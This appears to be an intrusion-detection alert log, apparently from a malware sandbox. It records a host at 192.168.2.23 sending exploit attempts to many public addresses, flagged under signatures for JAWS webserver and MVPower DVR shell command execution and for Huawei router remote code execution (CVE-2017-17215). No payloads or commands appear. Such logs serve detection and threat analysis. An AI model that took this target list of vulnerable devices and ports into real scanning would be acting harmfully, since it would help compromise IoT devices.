                                                            192.168.2.2335.223.2.16043372802030092 01/26/24-15:32:41.790683TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4337280192.168.2.2335.223.2.160
                                                            192.168.2.2389.117.50.16039032802030092 01/26/24-15:31:18.793714TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3903280192.168.2.2389.117.50.160
                                                            192.168.2.2323.59.184.24640766802025883 01/26/24-15:31:53.132854TCP2025883ET EXPLOIT MVPower DVR Shell UCE4076680192.168.2.2323.59.184.246
                                                            192.168.2.23174.129.134.13157028802025883 01/26/24-15:32:18.241039TCP2025883ET EXPLOIT MVPower DVR Shell UCE5702880192.168.2.23174.129.134.131
                                                            192.168.2.2323.207.85.2538660802025883 01/26/24-15:31:36.980434TCP2025883ET EXPLOIT MVPower DVR Shell UCE3866080192.168.2.2323.207.85.25
                                                            192.168.2.2345.143.98.8452284802025883 01/26/24-15:31:54.084287TCP2025883ET EXPLOIT MVPower DVR Shell UCE5228480192.168.2.2345.143.98.84
                                                            192.168.2.2380.211.121.12436946802030092 01/26/24-15:31:44.072128TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3694680192.168.2.2380.211.121.124
                                                            192.168.2.2323.15.47.8338132802025883 01/26/24-15:32:28.552407TCP2025883ET EXPLOIT MVPower DVR Shell UCE3813280192.168.2.2323.15.47.83
                                                            192.168.2.23204.174.66.8939856802030092 01/26/24-15:31:43.968492TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3985680192.168.2.23204.174.66.89
                                                            192.168.2.23154.95.217.17434028802030092 01/26/24-15:32:19.891483TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3402880192.168.2.23154.95.217.174
                                                            192.168.2.23138.201.91.23248082802030092 01/26/24-15:31:41.784028TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4808280192.168.2.23138.201.91.232
                                                            192.168.2.23202.143.87.21234310802030092 01/26/24-15:32:53.578197TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3431080192.168.2.23202.143.87.212
                                                            192.168.2.23172.121.187.15151508802025883 01/26/24-15:32:47.613814TCP2025883ET EXPLOIT MVPower DVR Shell UCE5150880192.168.2.23172.121.187.151
                                                            192.168.2.23144.196.51.22148752802030092 01/26/24-15:31:36.579593TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4875280192.168.2.23144.196.51.221
                                                            192.168.2.2352.202.65.12952068802025883 01/26/24-15:31:37.817906TCP2025883ET EXPLOIT MVPower DVR Shell UCE5206880192.168.2.2352.202.65.129
                                                            192.168.2.2367.7.139.18651592802030092 01/26/24-15:31:44.584489TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5159280192.168.2.2367.7.139.186
                                                            192.168.2.23156.224.12.16259940372152835222 01/26/24-15:33:01.456416TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5994037215192.168.2.23156.224.12.162
                                                            192.168.2.2327.74.199.24149786802030092 01/26/24-15:32:36.350234TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4978680192.168.2.2327.74.199.241
                                                            192.168.2.2341.47.185.5860580372152829579 01/26/24-15:31:53.094755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6058037215192.168.2.2341.47.185.58
                                                            192.168.2.2352.16.167.22043164802030092 01/26/24-15:31:52.881132TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4316480192.168.2.2352.16.167.220
                                                            192.168.2.23117.20.106.5755902802025883 01/26/24-15:31:26.892259TCP2025883ET EXPLOIT MVPower DVR Shell UCE5590280192.168.2.23117.20.106.57
                                                            192.168.2.2352.26.29.20958962802030092 01/26/24-15:32:32.545697TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5896280192.168.2.2352.26.29.209
                                                            192.168.2.2313.55.166.21340060802030092 01/26/24-15:32:35.983520TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4006080192.168.2.2313.55.166.213
                                                            192.168.2.2323.223.101.13038824802030092 01/26/24-15:32:07.813353TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3882480192.168.2.2323.223.101.130
                                                            192.168.2.23162.14.101.3338388802025883 01/26/24-15:31:26.997595TCP2025883ET EXPLOIT MVPower DVR Shell UCE3838880192.168.2.23162.14.101.33
                                                            192.168.2.23121.67.77.25041980802030092 01/26/24-15:32:33.043388TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4198080192.168.2.23121.67.77.250
                                                            192.168.2.23108.156.251.23339180802030092 01/26/24-15:32:21.585684TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3918080192.168.2.23108.156.251.233
                                                            192.168.2.23184.51.27.22247982802030092 01/26/24-15:32:07.295597TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4798280192.168.2.23184.51.27.222
                                                            192.168.2.2323.201.134.2259708802025883 01/26/24-15:32:30.795973TCP2025883ET EXPLOIT MVPower DVR Shell UCE5970880192.168.2.2323.201.134.22
                                                            192.168.2.2354.69.13.2843748802025883 01/26/24-15:31:16.977419TCP2025883ET EXPLOIT MVPower DVR Shell UCE4374880192.168.2.2354.69.13.28
                                                            192.168.2.23104.107.147.5552544802025883 01/26/24-15:32:01.807428TCP2025883ET EXPLOIT MVPower DVR Shell UCE5254480192.168.2.23104.107.147.55
                                                            192.168.2.232.23.6.5060212802030092 01/26/24-15:31:26.851705TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6021280192.168.2.232.23.6.50
                                                            192.168.2.23104.24.90.8534596802025883 01/26/24-15:32:25.541697TCP2025883ET EXPLOIT MVPower DVR Shell UCE3459680192.168.2.23104.24.90.85
                                                            192.168.2.23173.95.53.15444912802025883 01/26/24-15:31:47.666291TCP2025883ET EXPLOIT MVPower DVR Shell UCE4491280192.168.2.23173.95.53.154
                                                            192.168.2.2366.251.154.22433574802030092 01/26/24-15:32:50.968261TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3357480192.168.2.2366.251.154.224
                                                            192.168.2.2381.199.207.15437160802030092 01/26/24-15:32:01.907069TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3716080192.168.2.2381.199.207.154
                                                            192.168.2.2352.87.15.13548334802025883 01/26/24-15:32:19.584226TCP2025883ET EXPLOIT MVPower DVR Shell UCE4833480192.168.2.2352.87.15.135
                                                            192.168.2.23154.208.206.14256540802025883 01/26/24-15:32:25.566003TCP2025883ET EXPLOIT MVPower DVR Shell UCE5654080192.168.2.23154.208.206.142
                                                            192.168.2.232.21.34.9438766802030092 01/26/24-15:32:11.844043TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3876680192.168.2.232.21.34.94
                                                            192.168.2.2335.197.22.6754360802025883 01/26/24-15:32:56.785126TCP2025883ET EXPLOIT MVPower DVR Shell UCE5436080192.168.2.2335.197.22.67
                                                            192.168.2.23133.223.33.19153554802030092 01/26/24-15:32:25.532569TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5355480192.168.2.23133.223.33.191
                                                            192.168.2.2384.104.15.14847840802025883 01/26/24-15:33:01.527808TCP2025883ET EXPLOIT MVPower DVR Shell UCE4784080192.168.2.2384.104.15.148
                                                            192.168.2.23190.102.101.20333268802030092 01/26/24-15:32:28.469184TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3326880192.168.2.23190.102.101.203
                                                            192.168.2.2377.246.102.7938904802030092 01/26/24-15:32:19.760228TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3890480192.168.2.2377.246.102.79
                                                            192.168.2.2313.49.35.10336988802025883 01/26/24-15:32:28.348521TCP2025883ET EXPLOIT MVPower DVR Shell UCE3698880192.168.2.2313.49.35.103
                                                            192.168.2.2364.182.87.5945922802025883 01/26/24-15:31:13.719950TCP2025883ET EXPLOIT MVPower DVR Shell UCE4592280192.168.2.2364.182.87.59
                                                            192.168.2.23151.205.173.3258482802025883 01/26/24-15:32:47.726111TCP2025883ET EXPLOIT MVPower DVR Shell UCE5848280192.168.2.23151.205.173.32
                                                            192.168.2.23207.58.183.942880802030092 01/26/24-15:31:01.067805TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4288080192.168.2.23207.58.183.9
                                                            192.168.2.23164.46.69.6043902802025883 01/26/24-15:31:55.641850TCP2025883ET EXPLOIT MVPower DVR Shell UCE4390280192.168.2.23164.46.69.60
                                                            192.168.2.2323.57.227.14258234802025883 01/26/24-15:31:51.452288TCP2025883ET EXPLOIT MVPower DVR Shell UCE5823480192.168.2.2323.57.227.142
                                                            192.168.2.2313.226.190.7859202802030092 01/26/24-15:32:01.354131TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5920280192.168.2.2313.226.190.78
                                                            192.168.2.23172.255.248.15041094802030092 01/26/24-15:33:01.959349TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4109480192.168.2.23172.255.248.150
                                                            192.168.2.23154.19.112.20358058802030092 01/26/24-15:31:58.717861TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5805880192.168.2.23154.19.112.203
                                                            192.168.2.23154.81.106.11046190802025883 01/26/24-15:32:35.690212TCP2025883ET EXPLOIT MVPower DVR Shell UCE4619080192.168.2.23154.81.106.110
                                                            192.168.2.2320.240.179.11142334802025883 01/26/24-15:32:04.835960TCP2025883ET EXPLOIT MVPower DVR Shell UCE4233480192.168.2.2320.240.179.111
                                                            192.168.2.2346.242.156.19355956802025883 01/26/24-15:31:30.666540TCP2025883ET EXPLOIT MVPower DVR Shell UCE5595680192.168.2.2346.242.156.193
                                                            192.168.2.2323.211.159.19633108802030092 01/26/24-15:31:53.309815TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3310880192.168.2.2323.211.159.196
                                                            192.168.2.235.152.238.536550802030092 01/26/24-15:32:07.844825TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3655080192.168.2.235.152.238.5
                                                            192.168.2.2323.196.72.23146890802025883 01/26/24-15:32:15.819740TCP2025883ET EXPLOIT MVPower DVR Shell UCE4689080192.168.2.2323.196.72.231
                                                            192.168.2.23212.108.44.17052582802025883 01/26/24-15:32:25.494020TCP2025883ET EXPLOIT MVPower DVR Shell UCE5258280192.168.2.23212.108.44.170
                                                            192.168.2.23184.24.204.4847744802030092 01/26/24-15:31:26.778442TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4774480192.168.2.23184.24.204.48
                                                            192.168.2.2365.25.201.9034906802030092 01/26/24-15:31:49.478185TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3490680192.168.2.2365.25.201.90
                                                            192.168.2.23106.52.83.14857368802030092 01/26/24-15:32:07.993078TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5736880192.168.2.23106.52.83.148
                                                            192.168.2.23219.251.84.17336000802025883 01/26/24-15:32:33.033787TCP2025883ET EXPLOIT MVPower DVR Shell UCE3600080192.168.2.23219.251.84.173
                                                            192.168.2.23212.76.114.21245362802030092 01/26/24-15:31:26.866788TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4536280192.168.2.23212.76.114.212
                                                            192.168.2.23192.169.174.23060688802030092 01/26/24-15:31:01.265787TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6068880192.168.2.23192.169.174.230
                                                            192.168.2.2361.238.90.22750688802030092 01/26/24-15:31:17.092095TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5068880192.168.2.2361.238.90.227
                                                            192.168.2.23110.88.128.18545170802025883 01/26/24-15:32:30.780797TCP2025883ET EXPLOIT MVPower DVR Shell UCE4517080192.168.2.23110.88.128.185
                                                            192.168.2.2313.35.117.24748038802030092 01/26/24-15:31:01.184559TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4803880192.168.2.2313.35.117.247
                                                            192.168.2.2383.4.148.19847134802030092 01/26/24-15:32:36.974292TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4713480192.168.2.2383.4.148.198
                                                            192.168.2.23202.40.219.19959744802030092 01/26/24-15:31:47.532173TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5974480192.168.2.23202.40.219.199
                                                            192.168.2.238.130.31.21353132802030092 01/26/24-15:31:51.441434TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5313280192.168.2.238.130.31.213
                                                            192.168.2.23168.188.78.12934690802030092 01/26/24-15:31:32.999864TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3469080192.168.2.23168.188.78.129
                                                            192.168.2.23138.68.44.23233814802030092 01/26/24-15:31:52.709758TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3381480192.168.2.23138.68.44.232
                                                            192.168.2.2318.154.51.16553824802030092 01/26/24-15:31:13.820473TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5382480192.168.2.2318.154.51.165
                                                            192.168.2.2334.66.136.20042328802030092 01/26/24-15:31:23.711502TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4232880192.168.2.2334.66.136.200
                                                            192.168.2.2354.157.101.12738484802025883 01/26/24-15:32:53.420753TCP2025883ET EXPLOIT MVPower DVR Shell UCE3848480192.168.2.2354.157.101.127
                                                            192.168.2.232.23.231.4857626802025883 01/26/24-15:32:48.222059TCP2025883ET EXPLOIT MVPower DVR Shell UCE5762680192.168.2.232.23.231.48
                                                            192.168.2.23156.241.94.10647522372152835222 01/26/24-15:32:48.825043TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4752237215192.168.2.23156.241.94.106
                                                            192.168.2.23162.144.71.10436660802030092 01/26/24-15:32:04.770717TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3666080192.168.2.23162.144.71.104
                                                            192.168.2.2318.198.182.19860782802030092 01/26/24-15:32:21.578212TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6078280192.168.2.2318.198.182.198
                                                            192.168.2.2347.103.45.3158052802030092 01/26/24-15:32:13.113446TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5805280192.168.2.2347.103.45.31
                                                            192.168.2.23125.141.214.17657886802025883 01/26/24-15:31:27.982300TCP2025883ET EXPLOIT MVPower DVR Shell UCE5788680192.168.2.23125.141.214.176
                                                            192.168.2.23185.45.103.6455502802030092 01/26/24-15:31:41.714509TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5550280192.168.2.23185.45.103.64
                                                            192.168.2.23163.5.154.2347448802025883 01/26/24-15:31:49.533515TCP2025883ET EXPLOIT MVPower DVR Shell UCE4744880192.168.2.23163.5.154.23
                                                            192.168.2.2365.9.190.8041628802025883 01/26/24-15:31:51.771759TCP2025883ET EXPLOIT MVPower DVR Shell UCE4162880192.168.2.2365.9.190.80
                                                            192.168.2.23156.244.93.14353030802025883 01/26/24-15:31:41.576601TCP2025883ET EXPLOIT MVPower DVR Shell UCE5303080192.168.2.23156.244.93.143
                                                            192.168.2.23154.82.120.2445632802030092 01/26/24-15:32:28.451268TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4563280192.168.2.23154.82.120.24
                                                            192.168.2.23104.71.251.9738056802025883 01/26/24-15:32:07.600425TCP2025883ET EXPLOIT MVPower DVR Shell UCE3805680192.168.2.23104.71.251.97
                                                            192.168.2.2313.249.180.19955930802030092 01/26/24-15:31:30.559266TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5593080192.168.2.2313.249.180.199
                                                            192.168.2.23143.204.96.6033308802030092 01/26/24-15:32:18.732902TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3330880192.168.2.23143.204.96.60
                                                            192.168.2.2364.44.24.19941134802030092 01/26/24-15:31:52.674016TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4113480192.168.2.2364.44.24.199
                                                            192.168.2.23162.215.114.25336810802030092 01/26/24-15:32:48.749852TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3681080192.168.2.23162.215.114.253
                                                            192.168.2.2343.140.208.18834050802025883 01/26/24-15:32:22.048780TCP2025883ET EXPLOIT MVPower DVR Shell UCE3405080192.168.2.2343.140.208.188
                                                            192.168.2.2338.177.55.13441246802030092 01/26/24-15:32:22.560237TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4124680192.168.2.2338.177.55.134
                                                            192.168.2.23192.249.112.17734900802030092 01/26/24-15:31:35.552555TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3490080192.168.2.23192.249.112.177
                                                            192.168.2.23103.51.145.5143612802025883 01/26/24-15:31:43.888363TCP2025883ET EXPLOIT MVPower DVR Shell UCE4361280192.168.2.23103.51.145.51
                                                            192.168.2.23183.255.117.4441112802025883 01/26/24-15:32:40.101073TCP2025883ET EXPLOIT MVPower DVR Shell UCE4111280192.168.2.23183.255.117.44
                                                            192.168.2.2323.215.23.3059722802025883 01/26/24-15:31:44.065852TCP2025883ET EXPLOIT MVPower DVR Shell UCE5972280192.168.2.2323.215.23.30
                                                            192.168.2.2320.93.126.9855832802030092 01/26/24-15:33:00.496099TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5583280192.168.2.2320.93.126.98
                                                            192.168.2.2338.254.102.19336296802025883 01/26/24-15:31:41.705239TCP2025883ET EXPLOIT MVPower DVR Shell UCE3629680192.168.2.2338.254.102.193
                                                            192.168.2.23106.75.143.13134368802030092 01/26/24-15:32:50.178295TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3436880192.168.2.23106.75.143.131
                                                            192.168.2.23221.143.28.4843484802025883 01/26/24-15:32:59.009997TCP2025883ET EXPLOIT MVPower DVR Shell UCE4348480192.168.2.23221.143.28.48
                                                            192.168.2.2320.88.0.21156950802030092 01/26/24-15:32:48.719029TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5695080192.168.2.2320.88.0.211
                                                            192.168.2.2379.129.85.4050426802030092 01/26/24-15:32:53.836183TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5042680192.168.2.2379.129.85.40
                                                            192.168.2.2387.55.253.13856330802025883 01/26/24-15:32:09.847234TCP2025883ET EXPLOIT MVPower DVR Shell UCE5633080192.168.2.2387.55.253.138
                                                            192.168.2.23156.244.93.14353710802030092 01/26/24-15:31:55.700501TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5371080192.168.2.23156.244.93.143
                                                            192.168.2.23147.46.85.25539674802025883 01/26/24-15:32:04.696625TCP2025883ET EXPLOIT MVPower DVR Shell UCE3967480192.168.2.23147.46.85.255
                                                            192.168.2.23223.119.221.2845936802025883 01/26/24-15:32:42.152481TCP2025883ET EXPLOIT MVPower DVR Shell UCE4593680192.168.2.23223.119.221.28
                                                            192.168.2.2370.37.208.22547012802025883 01/26/24-15:32:41.653011TCP2025883ET EXPLOIT MVPower DVR Shell UCE4701280192.168.2.2370.37.208.225
                                                            192.168.2.2318.164.249.7846800802025883 01/26/24-15:31:01.375993TCP2025883ET EXPLOIT MVPower DVR Shell UCE4680080192.168.2.2318.164.249.78
                                                            192.168.2.23196.205.27.22641806802025883 01/26/24-15:32:04.941163TCP2025883ET EXPLOIT MVPower DVR Shell UCE4180680192.168.2.23196.205.27.226
                                                            192.168.2.2323.58.241.8340892802025883 01/26/24-15:32:25.540390TCP2025883ET EXPLOIT MVPower DVR Shell UCE4089280192.168.2.2323.58.241.83
                                                            192.168.2.2391.220.229.24957652802025883 01/26/24-15:31:44.826702TCP2025883ET EXPLOIT MVPower DVR Shell UCE5765280192.168.2.2391.220.229.249
                                                            192.168.2.2396.7.144.13155714802025883 01/26/24-15:31:17.001022TCP2025883ET EXPLOIT MVPower DVR Shell UCE5571480192.168.2.2396.7.144.131
                                                            192.168.2.2363.32.147.23747406802025883 01/26/24-15:32:33.778960TCP2025883ET EXPLOIT MVPower DVR Shell UCE4740680192.168.2.2363.32.147.237
                                                            192.168.2.23216.98.4.17555762802030092 01/26/24-15:32:09.658201TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5576280192.168.2.23216.98.4.175
                                                            192.168.2.2313.32.123.22959494802030092 01/26/24-15:32:36.929487TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5949480192.168.2.2313.32.123.229
                                                            192.168.2.2361.195.145.6556272802030092 01/26/24-15:32:21.950680TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5627280192.168.2.2361.195.145.65
                                                            192.168.2.23109.104.144.9857384802025883 01/26/24-15:31:52.901761TCP2025883ET EXPLOIT MVPower DVR Shell UCE5738480192.168.2.23109.104.144.98
                                                            192.168.2.23210.158.145.5749402802025883 01/26/24-15:32:28.374838TCP2025883ET EXPLOIT MVPower DVR Shell UCE4940280192.168.2.23210.158.145.57
                                                            192.168.2.2394.122.206.13541076802030092 01/26/24-15:32:23.629118TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4107680192.168.2.2394.122.206.135
                                                            192.168.2.2377.70.177.5053098802025883 01/26/24-15:31:41.363987TCP2025883ET EXPLOIT MVPower DVR Shell UCE5309880192.168.2.2377.70.177.50
                                                            192.168.2.23124.223.6.12651710802025883 01/26/24-15:31:37.082198TCP2025883ET EXPLOIT MVPower DVR Shell UCE5171080192.168.2.23124.223.6.126
                                                            192.168.2.2313.245.236.18635174802025883 01/26/24-15:31:33.077577TCP2025883ET EXPLOIT MVPower DVR Shell UCE3517480192.168.2.2313.245.236.186
                                                            192.168.2.23179.53.181.4856590802025883 01/26/24-15:32:09.544723TCP2025883ET EXPLOIT MVPower DVR Shell UCE5659080192.168.2.23179.53.181.48
                                                            192.168.2.23104.24.252.7356140802025883 01/26/24-15:31:01.089994TCP2025883ET EXPLOIT MVPower DVR Shell UCE5614080192.168.2.23104.24.252.73
                                                            192.168.2.23212.107.17.5343562802030092 01/26/24-15:31:20.948534TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4356280192.168.2.23212.107.17.53
                                                            192.168.2.2345.135.232.545120802030092 01/26/24-15:31:13.845208TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4512080192.168.2.2345.135.232.5
                                                            192.168.2.2349.4.64.19534308802025883 01/26/24-15:32:47.774923TCP2025883ET EXPLOIT MVPower DVR Shell UCE3430880192.168.2.2349.4.64.195
                                                            192.168.2.2334.160.251.13143950802025883 01/26/24-15:32:36.823697TCP2025883ET EXPLOIT MVPower DVR Shell UCE4395080192.168.2.2334.160.251.131
                                                            192.168.2.23148.139.122.14443836802030092 01/26/24-15:31:43.859827TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4383680192.168.2.23148.139.122.144
                                                            192.168.2.23124.223.6.12651710802030092 01/26/24-15:31:37.082198TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5171080192.168.2.23124.223.6.126
                                                            192.168.2.2394.255.246.23957434802025883 01/26/24-15:32:18.340341TCP2025883ET EXPLOIT MVPower DVR Shell UCE5743480192.168.2.2394.255.246.239
                                                            192.168.2.2392.204.202.2359382802025883 01/26/24-15:32:18.333463TCP2025883ET EXPLOIT MVPower DVR Shell UCE5938280192.168.2.2392.204.202.23
                                                            192.168.2.23212.51.159.2051022802025883 01/26/24-15:31:49.555601TCP2025883ET EXPLOIT MVPower DVR Shell UCE5102280192.168.2.23212.51.159.20
                                                            192.168.2.23167.82.11.16647000802025883 01/26/24-15:31:18.051241TCP2025883ET EXPLOIT MVPower DVR Shell UCE4700080192.168.2.23167.82.11.166
                                                            192.168.2.2347.135.166.18335540802030092 01/26/24-15:31:52.672906TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3554080192.168.2.2347.135.166.183
                                                            192.168.2.23167.71.50.3558148802025883 01/26/24-15:31:58.714447TCP2025883ET EXPLOIT MVPower DVR Shell UCE5814880192.168.2.23167.71.50.35
                                                            192.168.2.2341.89.94.8436374802030092 01/26/24-15:32:34.782595TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3637480192.168.2.2341.89.94.84
                                                            192.168.2.2323.235.205.3858374802030092 01/26/24-15:31:12.588509TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5837480192.168.2.2323.235.205.38
                                                            192.168.2.23156.254.67.20558516372152835222 01/26/24-15:31:52.465785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5851637215192.168.2.23156.254.67.205
                                                            192.168.2.23104.107.160.19948622802030092 01/26/24-15:31:52.877494TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4862280192.168.2.23104.107.160.199
                                                            192.168.2.23185.16.89.24148104802030092 01/26/24-15:32:01.351918TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4810480192.168.2.23185.16.89.241
                                                            192.168.2.2369.90.160.25452410802030092 01/26/24-15:31:23.708076TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5241080192.168.2.2369.90.160.254
                                                            192.168.2.2352.56.104.8535924802030092 01/26/24-15:32:41.945134TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3592480192.168.2.2352.56.104.85
                                                            192.168.2.23209.206.59.8743802802025883 01/26/24-15:32:18.540220TCP2025883ET EXPLOIT MVPower DVR Shell UCE4380280192.168.2.23209.206.59.87
                                                            192.168.2.2346.21.77.21937442802025883 01/26/24-15:32:42.019949TCP2025883ET EXPLOIT MVPower DVR Shell UCE3744280192.168.2.2346.21.77.219
                                                            192.168.2.23211.22.125.12247490802025883 01/26/24-15:33:00.860742TCP2025883ET EXPLOIT MVPower DVR Shell UCE4749080192.168.2.23211.22.125.122
                                                            192.168.2.2366.228.50.1543950802030092 01/26/24-15:31:33.008718TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4395080192.168.2.2366.228.50.15
                                                            192.168.2.23138.3.212.12138624802030092 01/26/24-15:32:23.948314TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3862480192.168.2.23138.3.212.121
                                                            192.168.2.23154.213.118.5740188802025883 01/26/24-15:31:48.000339TCP2025883ET EXPLOIT MVPower DVR Shell UCE4018880192.168.2.23154.213.118.57
                                                            192.168.2.238.217.167.1952856802025883 01/26/24-15:32:04.936288TCP2025883ET EXPLOIT MVPower DVR Shell UCE5285680192.168.2.238.217.167.19
                                                            192.168.2.23156.241.109.11940828372152835222 01/26/24-15:32:18.664967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4082837215192.168.2.23156.241.109.119
                                                            192.168.2.2323.194.56.7436204802025883 01/26/24-15:32:14.932098TCP2025883ET EXPLOIT MVPower DVR Shell UCE3620480192.168.2.2323.194.56.74
                                                            192.168.2.2338.14.3.12152026802025883 01/26/24-15:32:49.343724TCP2025883ET EXPLOIT MVPower DVR Shell UCE5202680192.168.2.2338.14.3.121
                                                            192.168.2.2395.216.144.14242362802025883 01/26/24-15:32:39.873221TCP2025883ET EXPLOIT MVPower DVR Shell UCE4236280192.168.2.2395.216.144.142
                                                            192.168.2.23152.0.245.2048074802025883 01/26/24-15:32:50.653183TCP2025883ET EXPLOIT MVPower DVR Shell UCE4807480192.168.2.23152.0.245.20
                                                            192.168.2.2344.205.91.11556454802025883 01/26/24-15:32:38.536898TCP2025883ET EXPLOIT MVPower DVR Shell UCE5645480192.168.2.2344.205.91.115
                                                            192.168.2.2393.179.30.21356902802030092 01/26/24-15:32:15.908806TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5690280192.168.2.2393.179.30.213
                                                            192.168.2.23162.215.114.25336810802025883 01/26/24-15:32:48.749852TCP2025883ET EXPLOIT MVPower DVR Shell UCE3681080192.168.2.23162.215.114.253
                                                            192.168.2.23159.192.157.644384802025883 01/26/24-15:32:36.360354TCP2025883ET EXPLOIT MVPower DVR Shell UCE4438480192.168.2.23159.192.157.6
                                                            192.168.2.2350.98.58.3954190802025883 01/26/24-15:31:53.687421TCP2025883ET EXPLOIT MVPower DVR Shell UCE5419080192.168.2.2350.98.58.39
                                                            192.168.2.23154.82.120.2445632802025883 01/26/24-15:32:28.451268TCP2025883ET EXPLOIT MVPower DVR Shell UCE4563280192.168.2.23154.82.120.24
                                                            192.168.2.23121.189.159.847844802030092 01/26/24-15:31:27.210827TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4784480192.168.2.23121.189.159.8
                                                            192.168.2.23161.111.10.10048080802030092 01/26/24-15:31:33.835673TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4808080192.168.2.23161.111.10.100
                                                            192.168.2.23120.46.144.12043272802025883 01/26/24-15:32:10.106479TCP2025883ET EXPLOIT MVPower DVR Shell UCE4327280192.168.2.23120.46.144.120
                                                            192.168.2.23186.132.69.4933608802025883 01/26/24-15:32:01.710929TCP2025883ET EXPLOIT MVPower DVR Shell UCE3360880192.168.2.23186.132.69.49
                                                            192.168.2.2318.66.93.4053630802025883 01/26/24-15:31:22.834753TCP2025883ET EXPLOIT MVPower DVR Shell UCE5363080192.168.2.2318.66.93.40
                                                            192.168.2.2354.79.81.18745534802025883 01/26/24-15:31:44.904507TCP2025883ET EXPLOIT MVPower DVR Shell UCE4553480192.168.2.2354.79.81.187
